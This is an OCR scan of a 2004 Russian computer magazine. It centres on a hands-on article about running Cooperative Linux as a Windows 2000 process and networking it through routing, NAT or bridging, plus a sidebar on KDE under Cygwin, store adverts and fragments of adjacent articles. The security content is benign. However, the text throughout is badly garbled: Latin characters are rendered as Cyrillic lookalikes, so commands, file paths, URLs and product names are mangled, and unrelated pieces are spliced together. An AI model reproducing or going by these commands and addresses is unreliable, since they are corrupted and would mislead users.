Вот и все, и не забудь указать команды перед запро- 
сом. 

ЗЫ. Пользуйся Штирлицем, чтобы переводить русский 
текст в числовую нотацию 
регсепІ(%Р5%Е0%ЕА%Е5%Р0) (обязательно). 



ЫКІгуа 

ііііЗЗйгѵ.ііі.ш 







0 се начинапось довольно безобидно. Я отдыхал после тяжелого трудового дня, иирно плавая по ссыпкам новостной ленты. Вдруг мой 
усталый взгляд привлекло сообщение о том, что группой японских программистов был разработан новый механизм запуска Ііпих из 
ШІПІІ0ѴѴ5. Причем речь шла не об использовании очередного эмулятора, типа ІІМѵѵаге, и не о портировании яинуксовых программ, 
вроде проекта Судшіп (кого сейчас этим удивишь?). Нет, в заметке утверждалось, что благодаря специальному драйверу и пропатченному 
ядру, Ііпих может работать в привилегированном режиме как отдельный процесс системы Шіпбоѵі/з 2000/ХР! Что ж, когда открытая ось 
работает в окошках как обычное приложение - такое в самом деле встретишь нечасто! И я полез на домашнюю страничку проекта со 
звучным названием Соорегаііѵе Ипих... 



СКРЕЩИВОЕМ Ш№ С ВИНДОЙ 





а Отличное место, 
с которого стоит 
начать изучение 
Ыпих: 

ѵѵѵѵѵѵ.ІіпихзИор.ги/Іі 

пихЬедіп 



А ЗНПКОИИМСЯ С ПРЕДМЕТОМ 

С удя по всему, дело было так: 
собрались как-то за вечер- 
ним пивком три японских 
программиста и подумали: 
"Если Ыпих может работать 
на любой архитектуре, то по- 
чему этой архитектурой не 
может быть другая операци- 
онная система?" Потом пиво закончилось, 
а вопрос остался. И в скором времени он 
стал лозунгом, под которым разрабатывал- 
ся Соорегаііѵе Шлих (сокращенно - 
соШпих). Хитрые эмуляторы всего железа 
отходят на второй план, соШпих (по сути - 
модифицированное ядро Ыпих) использует 
драйвера, которые перенаправляют 
ѴѴІпбоѵѵз запросы на доступ к аппаратным 
ресурсам. При этом авторы утверждают, 
что по производительности этот монстр 
будет не слишком отставать от "настояще- 
го" Линукса, запущенного на отдельной 
машине. И в нем, несмотря на его необыч- 
ное строение, без проблем будут работать 
все линуксовые бинарники. 



Поклонники ѴѴІпбоѵѵз, возрадуйтесь! Так 
как это чудо работает как обычный процесс, 
доступный через Тазк Мападег, теперь нена- 
вистный Шлих можно запускать и убивать, 
снова запускать и снова убивать. 

Хотя разрабатывается соШпих, конечно 
же, не для этого. Просто японские програм- 
мисты мечтают о том, чтобы Линуксом 




Подконтрольные процессы 



можно было пользоваться, не выходя из 
виндов. Дело-то хорошее! Ведь у многих 
основная операционка - ѴѴІпбоѵѵз, однако и 
Ыпих активно используется для решения 
некоторых задач. Или возьмем, к примеру, 
начинающих линуксоидов: сколько чайников 
сейчас, пытаясь освоить "этот страшный и 
сложный Линукс", ставят его на свою маши- 
ну, рискуя потерять при неосторожном дви- 
жении таблицу разделов на винче со всеми 
данными в придачу? Разумеется, для безо- 
пасности можно использовать ѴМѵгаге, но 
эмулятор, вынужденный эмулировать все 
что можно, от процессора до сетевой кар- 
ты, отжирает слишком много ресурсов. Тут 
же само название - Соорегаііѵе Шлих - успо- 
каивает, недвусмысленно намекая на воз- 
можность мирного сосуществования двух 
разных операционных систем... 

А ГОТОВИМ ИНСТРУМЕНТЫ 

Впрочем, доверять красивым словам я не 
привык. Сразу же захотелось проверить. 
Недолго думая, решил этот самый соШпих 
взять и заюзать. Сказано - сделано. Мо- 
ментально выяснилось, что проект настоль- 
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ко новый, что многие разделы сайта м.соі- 
іпих.огд пустуют, в списке рассылки наберет- 
ся всего пара десятков сообщений, а са- 
мый важный раздел - "документация" - со- 
держит всего одну строчку: "соШпих в нас- 
тоящий момент не имеет документации". 
Тем не менее, по ссылке РоѵѵпІоасІ я без 
труда вышел на самый первый доступный 
релиз, версии 0.5. 

Решил разбираться по ходу (когда это 
нас останавливало отсутствие документа- 
ции?). К тому же начало-то всегда одинако- 
вое: первым делом надо скачать весь необ- 
ходимый софт. В данном случае роль необ- 
ходимого софта играл пакет с набором 
программ (демон, монитор, ядро, драйвер 
виртуального адаптера) и образ дистрибу- 
тива ипих. 

Зачем понадобился дистрибутив? А дело 
в том, что соипих - это лишь модифициро- 
ванное ядро, но не дистрибутив со всеми 
программами и утилитами. Кстати, именно 
такие дистрибутивы мы обычно Линуксом и 
зовем, хотя на самом деле ипих - это толь- 
ко ядро и ничего больше. 

Однако я отвлекся. Для скачивания 
предлагался модифицированный образ 
дистрибутива ЭеЬіап ОКШ/ипих З.ОгО. 

Пока работала качалка, я постарался ре- 
шить другую проблему - отсутствие под ру- 
кой операционной системы ѴѴІпсІоѵѵз, так 
как на тот момент все мои машины работа- 



ли либо под Шлих, либо под РгееВбЭ. 
Пришлось прибегнуть к помощи преслову- 
того ѴМѵѵаге, в котором был установлен 
ѴѴІп2к Зегѵег Виз - единственное виндузо- 
подобное, что у меня нашлось. Картинка 
получилась веселая: "Ипих - ѴМѵѵаге - ѵѵіп- 
боѵѵз - соипих". Нехилая нагрузка на два 
гигагерца моего ноутбука. 

Л ПРИСТУППЕМ К ОПЕРПЦИИ 

Как я уже упоминал, документации нет, но 
всю необходимую информацию мне уда- 
лось найти в файле ВЕАРМЕ. Следуя 
инструкции, я первым делом установил но- 
вый сетевой адаптер, Тар-ѴѴіп32, которому 
не соответствует ни один реальный девайс. 
Этот брутальный хак предназначен для то- 
го, чтобы соипих видел сеть. Установка вы- 
полнялась, как это принято в ѴѴІпсІоѵѵз, 
мышкой: Пуск - Настройки - Панель управ- 
ления - Установка оборудования. 

Обрати внимание: сначала глупая винда 
пытается угадать, что за железку ты вста- 
вил (а мы ничего не вставляли, хе-хе), но 
быстро сдается. Тогда-то ее и следует об- 
разумить галочкой "я уже все вставил" и 
выбрать тип девайса - "сетевой адаптер". 
На резонный вопрос о том, какую сетевую 
плату ты хочешь установить, следует отве- 
тить нажатием на "Установить с диска" и 
указанием пути к Іарсігѵ.зуз. После этого на 
одну сетевую карту у тебя станет больше. 

Далее в ЯЕАЭМЕ предла- 
галось выбрать директорию 
для установки и распаковать 
туда и дистрибутив, и пакет 
соипих, учитывая при этом, 
что разжатый образ дистри- 
бутива ЭеЬіап займет один 
гигабайт (все программы и 
библиотеки, как-никак). 
Разработчики рекомендуют 
ставить все в СДсоНпих - 
тогда, дескать, не придется 
менять путь к образу дист- 
рибутива в конфиге 
беіаиіі.соііпих.хті. Увы, я на 
эти рекомендации наплевал, 
за что и поплатился. Уста- 




ССЫПКИ ПО ТЕМЕ 



л ѵѵѵѵѵѵ.соііпих.огд - содержит необходимые пакеты для уста- 
новки соЫпих, документации пока нет, зато есть скромный, но 
полезный список рассылки, где активно обсуждаются пробле- 
мы установки и запуска соЫпих. 

л ѵѵѵѵѵѵ.ИсІр.огд - если ты решил изучить Ыпих, то ТПе Ыпих 
Ооситепіаііоп Ргоіесі станет твоим вторым домом. Здесь есть 
масса всевозможных РАО и НОѴѴТО, все отлично структуриро- 
вано. 

л ѵѵѵѵѵѵ.ѵтѵѵаге.сот - коммерческий эмулятор РС под ѴѴІпсІоѵѵз 
и Ыпих, эмулирует все, от процессора до видеокарты, позволя- 
ет запускать в эмуляции практически все популярные операци- 
онки. 

л ѵѵѵѵѵѵ.судѵѵіп.сот - Ыпих-окружение в ѵѵіпсіоѵѵз, для скучаю- 
щих по консоли юниксоидов, по какой-то причине пребываю- 
щих в виндах :). Тем не менее, под него спортированы практи- 
чески все популярные юниксовые программы и сервисы, нап- 
ример, орепззМ, ХРгее86, КОЕ. 

л ксіе-судѵѵіп.зоигсеіогде.пеі - страница проекта КОЕ под 
ѴѴІпсІоѵѵз. 

т 




новив все в папку е:\СоІіпих и поправив 
конфиг соответствующим образом: 
ра(б="\Оо$Оеѵісе5\е:\СоІіпих\ОеЬіап- 
З.ОгО.ехІЗ.ІдЬ", я обнаружил, что демон ни в 
какую не хочет запускаться. Это меня огор- 
чило, поскольку на диске С: у меня не хвата- 
ло места для гигабайтного образа РеЬіап (не 
забывай, что я все это мутил в ѴМѵѵаге, а 
места под виртуальный диск отвел мало). 
Однако все оказалось просто - путь к образу 
я оставил таким же, и сам образ остался ле- 
жать в е:\СоІіпих, но содержимое пакета 
соипих я переместил в рекомендуемую пап- 
ку С:\соипцх, благо весило оно немного, и 
места хватило. Все моментально заработало. 

После разрешения вопроса с дислокацией 
файлов оставалось всего ничего - запустить 
сам демон (файл соііпих-баетоп.ехе), и если 
звезды будут к тебе благосклонны, то, как 
утверждают разработчики, появится консоль 
со следующими строчками: 

Соорегаііѵе Ыпих Цаетоп 

МаІІІпд кегпеі Цгіѵег 

Сгеаііпд топііог 

Мопііог і$ гиппіпд 

Мне повезло (в тот день звезды были, ви- 
димо, на моей стороне) - все именно так и 
произошло. Появилась лаконичная консолька 
стб.ехе с четырьмя строчками, а индикатор 
сетевого соединения в трее радостно миг- 
нул, намекая на то, что виртуальный адаптер 
активирован. Адаптер, кстати, оказался де- 
сятимегабитным :). Это значило, что про- 
цесс соипих удачно запустился, дистрибутив 
загрузился, и между ним и ѵѵіпсіоѵѵз-маши- 
ной поднялось физическое сетевое соедине- 
ние. Чтобы теперь "приаттачиться" к процес- 
су соипих, я запустил соііпих-сопзоіе.ехе, 
выбрал Мопііог -> МопіІогО, и передо мной 
во всей красе предстала консоль дистрибу- 
тива ЭеЫап бкІІІ/ипих, который даже и не 
подозревал, что работает на птичьих правах 
процесса ѴѴІпсІоѵѵз 2000. 

Л ПОДРУБПЕМ СЕТЬ 

Что делает любой юниксоид (даже начина- 
ющий :)) первым делом? Правильно, под- 
нимает сетку. У меня на машине стояла се- 
тевая карта, смотрящая в сторону локалки, 
и, разумеется, я тут же захотел вывести 
соЫпих на бескрайние просторы интернета. 
Набрав іТсопТід -а, я увидел, что сетевой 
интерфейс присутствует в количестве одной 
штуки, но больше мне и не требовалось. 
Только вот в поле МАО А00ВЕ55 стояли ну- 
ли, ситуация нетипичная для "настоящего" 
Ыпих. Попытка сконфигурировать интер- 
фейс ничего не давала. Конечно, ведь сна- 
чала нужно было настроить его "со сторо- 
ны" ѴѴІпсІоѵѵз, поэтому я, недолго думая, по- 




л Общепризнанно 
лучшей книгой о 
Ыпих считается 
Виппіпд Ыпих ("За- 
пускаем ипих") из- 
дательства 
О'ВеіІІу. Она вы- 
держала уже четы- 
ре издания, пос- 
леднее вышло в 
2002 году. Это 
классика. 

ѵлш.огеіііу.сот/саі 

аІод/гипих4 

л Пакеты - это 
программы, ском- 
понованные утили- 
той іаг и сжатые 
архиватором дгір 
или Ьгір2. С 
дгір'ом легко 
справляется 
ѵѵіпгір, а ^-архи- 
вы умеет распако- 
вывать ѵѵіпгаг. 

а Популярные 
ЫѵеСО- 

дистрибутивы: 
КЫОРРІХ - 
ѵшѵѵ.кпорріх.огд 
ЗиЗЕ ЫѵеСО - 
ѵтѵѵ.Ііпихі50.огд/сІі 
5Іго.рИр?(1і5іго=2 

Вообще, на 
ѵѵѵѵѵѵ.Ііпихізо.огд 
есть ссылки 
практически на все 
популярные 
дистрибутивы Ипих, 
которые можно 
свободно скачать. 
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л Клонов удачного 
кноппикса разве- 
лось бесчисленное 
множество. Рус- 
ская версия дист- 
рибутива доступна 
по адресу 
ѵтш.кпорріх.ги. 



лез в настройки фейкового Тар-ѴѴіп32 адап- 
тера, выбрал "Статус - Свойства - Настрой- 
ка протокола ТСР/ІР" и присвоил ему адрес 
192.168.3.5. При этом второе, "настоящее", 
соединение в виндах, соответствующее се- 
тевой карте, имело у меня адрес 
192.168.1.4, а шлюзом в интернет выступа- 
ла машина с адресом 1 92. 1 68. 1 . 1 . Нако- 
нец, команда іісопіід е№0 192.168.3.6 рас- 
ставила все по местам. 

Теперь я мог пинговать винду из соШпих. 
Вся схема была как на ладони: собпих как бы 



"соединяется" с ѵѵіпбоѵѵз-машиной "сетевым 
кабелем", один конец которого "втыкается" в 
"машину с соНпих", а второй конец - в вирту- 
альный интерфейс ѵѵіпбоѵѵз-тачки. Собствен- 
но, ничего примечательного в этом нет, это 
один из возможных способов работы сети в 



ѴМѵѵаге. При этом винда выступает в качест- 
ве шлюза по умолчанию для собпих, и долж- 
на маршрутизировать пакеты между своими 
интерфейсами, чтобы собпих увидел сеть за 
ѵѵіпсіоѵѵз-машиной, а именно - мой шлюз в 
интернет и сам интернет. Но в текущей кон- 





ставим 

КОЕ НО ШІИВ01Н8 



У разработчиков соУпих полноценный рабочий дист- 
рибутив, сХ-сервером и оконным менеджером, еще 
только в планах, но ты уже сегодня можешь попробо- 
вать один из самых полнофункциональных ОЕ (Оезкіор 
Епѵігоптепі:) для 1_іпих, не выходя из окон ѴѴІпбоѵѵз. Ко- 
нечно, это все баловство, но порой действительно хо- 
чется сменить рабочую обстановку на нечто новенькое, 
сохранив ощущение целостности, которое дают интег- 
рированные рабочие окружения "все в одном". Как раз 
таким новым окружением может стать для тебя КОЕ, 
предпоследняя стабильная версия которого - 3.1.4 - 
доступна для скачивания и установки под Судѵѵіп (сов- 
сем недавно вышел КОЕ 3.2, но его пока еще не спор- 
тировали). Копциегог вместо ехріогег, КтаіІ вместо 
ОиІІоок, ІЧоаІип вместо ѴѴІпатр, игрушки на уровне "са- 
пера" и "пасьянса", ну и, наконец, линуксовая консоль, 
так, на всякий 
случай. Что, захо- 
телось попробо- 
вать? Решено, бу- 
дем ставить КОЕ 
на винды! 

Для начала потре- 
буется инсталли- 
ровать базовое 
окружение 
Судѵѵіп. Придется 
прогуляться на 
«ш.судшп.сош и ска- 



чать 300-кило- 
байтный инсталля- 
тор. После запуска 
он предложит выб- 
рать одно из зер- 
кал сайта и выка- 
чать оттуда пакеты 
для установки. 

Стоит ограничить- 
ся базовым набо- 
ром пакетов, а из 
дополнительных 
поставить библио- 
теку 2 ІІЬ, иначе КОЕ впоследствии сильно огорчится. Уч- 
ти, что всевозможных пакетов очень много, и если ты 
выберешь что-то лишнее, то качаться все будет до вто- 
рого пришествия. Так что мои рекомендации: качать по 
минимуму, а если потом Судѵѵіп будет ругаться на отсу- 
тствие каких-нибудь библиотек - догрузить необходи- 
мые пакеты. Кроме базового набора, понадобятся па- 
кеты категории ХРгее86, их много, но необходимых все- 
го несколько: ХРгее86-Ьіп, ХРгее86-е1с, ХРгее86-1суг, 
ХРгеевб-Іепс, ХРгее86-1п1з, ХРгее86-ІІЬ, ХРгее86-з1аПир- 
зсгіріз, ХРгее86-хзегѵ, библиотеки, программы, шрифты 
и сам Х-сервер. После того как все выкачано и установ- 
лено, смело кликай на Рабочем столе ярлык Судѵѵіп - за- 
пустится окно терминала, но не ѵѵіпсіоѵѵз соттапсі 
рготрі, а полноценная линуксовая консоль. 

Грузиться ему не надо, так как это не эмулятор. Для 
корректного завершения установки пакетов необходи- 
мо выполнить скрипты, расположенные в /еіс/розііп- 
зіаіі. В принципе, поиграться с Судѵѵіп/Х можно уже 
сейчас, запустив ХѴѴІп - так называется виндовый ана- 
лог ХРгее86. Рекомендую отредактировать скрипт его 
запуска /изг/ХІ ІНб/Ьіп/зІагіхѵѵіп.зН, найдя строчку за- 
пуска ХѴѴіп, вписать туда 
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ПИНГВИН В ФОРТОЧКЕ 



фигурации соШпих не видел ничего дальше 
обоих интерфейсов ѵѵіпбоѵѵз-машины. 

Например, я безрезультатно пинговал 
192.168.1.3 - хостовую машину, на которой 
крутилась ѴМѵѵаге. Что, впрочем, было ло- 
гично - если немного представлять себе 
принципы маршрутизации, легко понять, 
что машине с адресом 192.168.1.3 прихо- 
дят пакеты с адреса 192.168.3.6, но она об 
этой сети (192.168.3.0) ничего не знает (я 
ее только что создал на виртуальном Тар- 
ѴѴІп32 интерфейсе) и потому не может ре- 
шить, куда отсылать ответы. Поэтому, если 
необходимо вывести соШпих в сеть за ѵѵіп- 
боѵѵз-машиной (например, в инет), то сде- 
лать это можно тремя способами. 

Первый, и самый простой для локальной 
сети - на всех маршрутизаторах по пути 
следования пакетов от соШпих прописать 
маршрутизацию в новую виртуальную сет- 
ку. Мне потребовалось сделать две записи 



- на хостовой Ііпих-машине прописать роу- 
тинг в эту сеть через ѵѵіпсіоѵѵз, запущенную 
в ѴМѵѵаге: 

гоиіе аЦЦ -пеі 192.168.3.0 пеітазк 255.255.255.0 д» 

192.168.1.4 

А на РгееВЗР-шлюзе непосредственно в 
интернет прописать роутинг до сети 
соШпих через ту Ііпих-машину с адресом 
192.168.1.3: 

гоиіе а (ІО -пеі 192.168.3.0/24 192.168.1.3 

После этого мой соШпих смог-таки са- 
мостоятельно выползать в Сеть :). 

Если ты решил повторить мои экспери- 
менты, и этот способ тебе не подходит (до- 
пустим, ты не отвечаешь за маршрутиза- 
цию в своей локалке, а админам на твои 
проблемы наплевать), воспользуйся спосо- 



бом номер два - настрой МАТ (пеіѵѵогк 
асМгезз ігапзіаііоп) на ѵѵіпсіоѵѵз-машине, на 
которой запущен соШпих. 




I Если необходимо вывести соЫпих в сеть 1 
за ѵііпсіоѵге-машиной (например, в инет), 
т то сделать это можно тремя способами. , 





Внешний вид по умолчанию - пресловутый Кегатік 



После набора ко- 
манды зіагіхѵѵіп.зіі 
иксы запустятся в 
полноэкранном ре- 
жиме, с термина- 
лом в левом углу, а 
в виндовом трее 
появится значок X- 



сервера. Уже можно запускать иксовые приложения, типа 
хсаіс, или простейшие легковесные менеджеры. 



ХѴѴІп -ипіхкіІІ -ети- 
ІаТеЗЬиТТопз -сіір- 
ЬоагсІ -ТиІІзсгееп - 
сіерііт 32 &. 



Наконец, скачиваем КОЕ. На Шр://к(1е-судѵііп.$оіігсеІогде.пе1 мож- 
но взять важнейшие четыре пакета: ксІеІІЬз, ксіебазе - 
без библиотек и основных программ не будет КОЕ, 
ксіепеіѵѵогкз - мы же собираемся Сеть бороздить, и цТ 
- кроссплатформенная библиотека, на которой КОЕ и 
написан. Если пакеты Судѵѵіп ты установил в с:\суд- 
ѵѵіп, то самый простой способ - положить скачанные 
архивы в эту директорию и там их распаковать. 




| КРЕ в оконном режиме 



У тебя появится 
новый каталог 
/орі с КОЕ и ОТ. 
Далее необходи- 
мо выполнить 
скрипты 

/еІс/рго(ІІе.(1/ді3.2.$1і и /еіс/рго- 
ГіІе.(І/ксІе314.5Іі, впро- 
чем, они автома- 
тически выполня- 
ются при старте 
системы. Либо 



просто добавь пути /орІ/кйеЗ/Ып, /орЕ/кйеЗ/ІІЬ, /орЕ/кбеЗ/МЬ/кйеЗ, 

/орІ/чШ/Ьіп в переменную РАТН: есію РАТН=/орІ/кс1еЗ/Ып:/орІ/ 
кс!еЗ/ІіЬ:/орІ/ксІеЗ/ІіЬ/ксІеЗ:/орІ/дІ/3.2/Ып:$РАТН. 

Затем набери зіагіх, и у тебя начнет грузиться КОЕ. 
Либо сначала запусти ХѴѴІп описанным выше спосо- 
бом, а затем в терминале набери зіагіксіе. На экране 
возникнет симпатичный сплеш-скрин, и КОЕ пойдет 
загружать свои сервисы. Это, как правило, занимает 
от десяти до сорока секунд, все-таки КОЕ - "тяжелая" 
рабочая среда. 

Надо заметить, что получившаяся система "ѵѵіпсіоѵѵз - 
Судѵѵіп - КОЕ" вполне даже работоспособна. На своем 
р4 2,4 ГГц/1 Гб ВАМ я совсем не заметил каких-либо 
тормозов. Что здесь можно делать? Да то же, что и в 
виндах - читать почту, ползать по сайтам. Консоль 
Судѵѵіп - это хорошо, но линуксоиды пользуются не 
только командной строкой, но и красивыми оконными 
менеджерами. 

Как выясняется, сожительство двух противоборствую- 
щих систем в некоторых случаях может быть вполне 
гармоничным. 
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УЖЕ В ПРОДАЖЕ 



КДЛ 1МНА. И ‘нц ДАНЬН-У; 'ТГГ»№ 




РКЕЕООМ РОКСЕ ѴЗ. 



ТНЕ ТНІКО РЕІСН 



Мы проливаем свет на продолже- 
ние лучшей игры по мотивам 
комиксов - необычного и 
неоднозначного тактического 
экшна 2003 года. 

5РЕСІАІ- 



Специальный материал! 
МОРСКОЙ ОХОТНИК 
Мощнейший военно-морской 
симулятор готовится к спуску на 
воду. Подробно об этом перспек- 
тивном проекте только у нас. 



ИГРОВЫЕ ВСЕЛЕННЫЕ 
ВСЕЛЕННАЯ ѴѴІ2АРЮКѴ 



Легенда ролевого жанра. По- 
другому никак не назовешь. 
Вышедшая в 2001 году ѴѴігагсІгу 
VIII стала на сегодняшний день 
последней в знаменитом сериале. 
Какой же будет дальнейшая судьба 
легендарной игры? 



ѴѴІКЕІ.Е55 САМІІМС РЕѴІЕѴѴ 



Специальное приложение об 
играх на мобильных устройствах. 
Выпуск второй. 



А также: новости, ргеѵіеѵѵ, 
геѵіеѵѵ, советы по прохождению 
игр, топ 20, Ріреііпе и т.д. 





КОИПОКТНЫЕ ДИСТРИБУТИВЫ 

П ринцип работы соЫпих в чем-то можно сравнить с работой 
популярных сейчас так называемых Ыѵе-СО, когда дистрибу- 
тив І_іпих загружается с компакт-диска, и образ файловой сис- 
темы с предустановленными программами и настроенными 
сервисами монтируется как корневой в создаваемую в опера- 
тивной памяти файловую систему (тетогу Тііе зузіет), позво- 
ляя работать в І_іпих без установки его на жесткий диск. Самые 
популярные Ыпих Ыѵе-СО - КІЯОРРІХ, 5и5Е І_іѵе, РТК. Есть по- 
добные проекты и с другими никсами - Ргепгу РгееВЗО ЫѵеСО. 
1_іпих Ыѵе-СО как нельзя лучше подходят для изучения І_іпих без 
риска сделать что-то не так. 




Третий метод заключается в построении 
моста (Ьгісіде) между двумя картами, насто- 
ящей и фейковой. 

Тогда на них исчезнут ІР-адреса (потому 
что мост - это маршрутизатор канального 
уровня, он не работает с ІР-адресами, при- 
нимая решение о маршрутизации на основе 
других параметров пакета (глас-адреса)), и 
соШпих будет как бы частью локальной се- 
ти. Соответственно, если это сеть 
192.168.1.0, то соі-іпих'у можно присвоить 
любой свободный адрес, например 
1 92. 1 68. 1 . 1 1 , и будет ему счастье. Но есть 
нюанс. Даже два. Первое - сама ѵѵіпсіоѵѵз- 
машина перестанет видеть сеть (у нее же 
исчез ІР-адрес на настоящем интерфейсе), 
и второе - ѵѵіпсіоѵѵз 2000 штатными сред- 
ствами не умеет делать бриджинг. И это 
называется серверная ОС... В оправдание 
Місгозой можно сказать, что и в ѴѴІпХР (хо- 
тя ХР и не серверная ОС), и в ѴѴІпсіоѵѵз 
Зегѵег 2003 наконец-то появился и нор- 
мальный ИАТ, и Ьгісіде там делается эле- 
ментарно - выделяешь мышкой нужные два 
соединения и в контекстном меню выбира- 
ешь абсі Іо Ьгйде. Как говорится, и ста лет 
не прошло. Ну а проблему доступа в сеть 
самой ѵѵіпсіоѵѵз-тачки можно решить добав- 
лением второй настоящей сетевой карты, 
тогда два из трех соединений уйдут на 
мост, а третье будет провайдить сетку са- 
мой ѵѵіпсіоѵѵз. 



И самое важное - в двух первых случаях 
между двумя интерфейсами в ѵѵіпсіоѵѵз дол- 
жен быть настроен ір-іопд/агсііпд. Поковы- 
рявшись в реестре, я вспомнил, что дела- 
ется это установкой переменной 
НКЦѴІ\Сиггеп1СопІгоІ5еІ\Зегѵісе5\ТсрІр\Рагат 
еігез\ІрЕпаЫеПоиіег в 1 . 

А И ЧТО ДОЛЬШЕ? 

Наконец-то сеть настроена. И что, неужели с 
этим можно работать? Маленькие буковки в 
терминале - не то, что я ожидал! - скажешь 
ты. Где Х-ѴѴІпсіоѵѵ, где прозрачные терми- 
нал™, где красивый КОЕ, наконец? Спокой- 
но, приятель, образ РеЬіап, который прила- 
гается для скачивания, это только один из 
вариантов. Помни, что собпих - всего лишь 
метод загрузки и работы в виде драйвера 
для ѵѵіпсіоѵѵз и патча к ядру. А дистрибутив 
к нему можно прикрутить любой. К приме- 
ру, разработчики успешно запустили под 
соШпих популярный Ыѵе-СО КІМОРРІХ со 
слегка модифицированным загрузчиком... 

Я тоже времени даром не терял. Если полу- 
чится, в следующий раз постараюсь тебе 
рассказать, как я запускал в соШпих окон- 
ный менеджер, и как создавал свой образ 
дистрибутива Шлих для работы под собпих. 
Впечатлений - уйма! Хотя... Зачем тебе ме- 
ня ждать? Все необходимые ссылки даны - 
смотри, качай и начинай ставить свои 
собственные "генетические опыты" :). ЗИ 










МНОГОКАНАЛЬНЫЙ 



роишіб 



7 - 55555-7 

ТЕЛЕФОН КЛИЕНТСКОЙ СЛУЖБЫ 




РЕШЕНО: 

Необнодит ! 



Логотипы N1 Сотриіег и РОЬАРІЗ являются зарегистрированными знаками их владельцев. Іпіеі, Іпіеі Іпзісіе І_о(|о, Репііит являются зарегистрированными торговыми знаками корпорации ІпіеІ и ее дочерних компаний в США и других странах. 



реггііут ^ 



г. Москва, м. Сокол, Волоколамское шоссе, 2 (095) 151-5503 

г. Москва, м. Шаболовская, ул. Шаболовка, 20 (095) 237-8240 

г. Москва, м. Красносельская, ул. Краснопрудная, 22/24 (095) 262-8039 

г. Москва, м. Комсомольская, ун-г «Московский», 4 эт., пав. 27 (095) 916-5627 

г. Москва, м. Профсоюзная, Нахимовский пр-т, 40 (095) 129-1119 

г. Москва, м. Площадь Ильича, ул. С. Радонежского, 29/31 (095) 278-5470 

г. Москва, м. Савеловская, ВКЦ «Савеловский», пав.: 024 (095) 784-6385 

г. Москва, м. Щукинская, ул. Новощукинская, 7 (095) 935-8727 

г. Москва, м. Пражская, ТЦ «Электронный рай», пав.: 1Б-47 (095) 389-4622 

г. Москва, м. Люблино, ТК «Москва», 2 этаж, 1 линия (095) 359-8915 

г. Москва, м. Савеловская, Сущевский вал, 3/5 (095) 973-1133 

г. Москва, м. Багратионовская, ТВК «Горбушкин Двор», пав.: Е2-14/15 (095) 730-1549 
г. Москва, ул. Малая Дмитровка, 1/7 НОВЫЙ (095) 200-3060 

г. Москва, м, Красносельская, ул. Русаковская, 2/1 (095) 264-1333 

г. Москва, м. Динамо, ул. 8 Марта, 10, стр. 1 (095) 363-9333 

г. Москва, м. Братиславская, ул. Братиславская, 16, стр. 1 (095) 347-9638 

г. Москва, м. Дмитровская, ул. Башиловская, 29/27 (095) 797-8064 



г. Санкт-Петербург, м. Пр. Просвещения, ТК «Норд», пав. 204 (812) 331-6244 

г. Санкт-Петербург, м. Академическая, ТК «Грэйт», пав. 28 (812) 590-8480 

г. Н. Новгород, ул. Пискунова, 30 (8312) 78-0861 

г. Н. Новгород, м. Канавинская, ТЦ «Новая Эра», 1 этаж (8312) 16-9787 

г. Н. Новгород, ТЦ «Новая Эра», «Цифровая студия Р0І.АРІ5» (8312) 16-9788 

г. Ростов-на-Дону, пр-т Буденновский, 11/54 (8632) 62-3978 

г. Ростов-на-Дону, пр-т Буденновский, 80 (8632) 92-4242 

г. Ростов-на-Дону, пр-т Нагибина, 34Л, ТЦ «Поиск» (8632) 72-5472 

г. Ростов-на-Дону, пр-т Ворошиловский, 12 (8632) 40-5353 

г. Воронеж, ул. Кольцовская, 82 (0732) 72-7391 

г. Воронеж, пр-т Революции, 44 (0732) 20-5055 

• Магазин с бесплатной доставкой по Москве зНор.піги (095) 970-1939 

• Отдел корпоративных решений: ул. 8 Марта, д. 10, стр. 1 (095) 363-9333 



Больше возможностей для 
развлечений уже сегодня. 



• З-х летнее бесплатное обслуживание, включая год полной гарантии 

• бесплатное обслуживание на рабочем месте в Москве (в пределах МКАД) 

• 100% предпродажное тестирование 

• отличные характеристики для работы дома и в офисе 



Используйте компьютер АдёГІТ на базе процессора ІпІеІ®РепІіит®4 
с технологией НТ. Вы сможете выполнять несколько задач одновременно, 
например, слушать музыку во время кодирования фильма. 







РС_20№ 



/ Х0КЕР/№03(63)/2004 



И у вот, пройден поспедний уровень, гейиерский азарт угас, а расставаться с попюбившейся игрушкой жапко... Может, посвятить ей 
скин к ШіпОтр’у? Или оформить ее картинками сайт? О может, заняться покапизацией ипи использовать понравившиеся текстуры 
в своей собственной программе? Нет? О как насчет того, чтобы нацепить на самого злобного монстра лицо начальника и разнести 
его на несколько маленьких негодяев... Заманчивая идея, верно? И ведь выполнить любое из описанных действий проще простого - нужно 
лишь натравить на игруху подходящий риппер мультимедийных ресурсов! 



ВЫТПСКИВПЕМ МУПЫИМЕЛИП-РЕСУРСЫ ИЗ ИГР 




Л ЗПЧЕМ ЭТО НУЖНО 

И КПК ДЕППЕТСЯ 

большинстве случаев распотро- 
шить игру не так-то легко. 

Очень редко все игровые вкус- 
ности раскладываются по ката- 
логам в виде файлов Ьплр и 
ѵгаѵ. Гораздо чаще разработчи- 
ки собирают мультимедийную 
инфу в отдельные большие "архивы", из ко- 
торых ее приходится вытаскивать. К 
счастью, это не так сложно, поскольку фор- 
мат у таких "архивов" обычно элементарный, 
а сжатие (если оно есть) представляет собой 
простейший гір. Но есть другая проблема: 
награбленные ресурсы перед использовани- 
ем приходится зачастую перегонять в удобо- 
варимую форму. Ведь каждый третий разра- 
ботчик норовит сохранить данные по-свое- 
му! А преобразовать их в обычные форматы 
- задача не из легких. 

По этой причине почти для каждой игрухи 
нужны специальные рипперы, заточенные 
именно под нее. К играм на одном движке 
это не относится - для них, как правило, 
подходит один и тот же софт. А поскольку 
количество игр исчисляется тысячами, то и 
программ для их потрошения понаделано не 




меньше. Правда, в последнее время сами 
разработчики стали делиться с пользовате- 
лями своими утилитами. Но и их возможнос- 
тей зачастую не хватает. Ну а для старых 
шедевров игрового искусства нет и этого... 

В общем, я не буду пытаться объять не- 
объятное и рассказать тебе обо всем воз- 
можном софте для откапывания игровых ре- 
сурсов - все эти софтины похожи и функцио- 
нируют одинаково. Лучше возьмем в наши 
натруженные хакерские руки несколько наи- 
более универсальных инструментов и погля- 
дим на их примере, что интересного можно 



вытащить из любого ЗР-шутера, стратегии 
или квеста... 

Л ОППСОИ ІІИРПСКЕН II 5.0 



ОС: ІІІпАІІ 

Размер: 3,1 Мб 
Лицензия: Ргееиаге 
Сайт: им.йгадопипраскег.сот 



Одна из самых популярных программ, 
способная "всасывать" архивы от 130 или 
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ТРЕХМЕРНЫЕ ТОП-МОДЕЛИ 

Г рафика и 
музыка - 
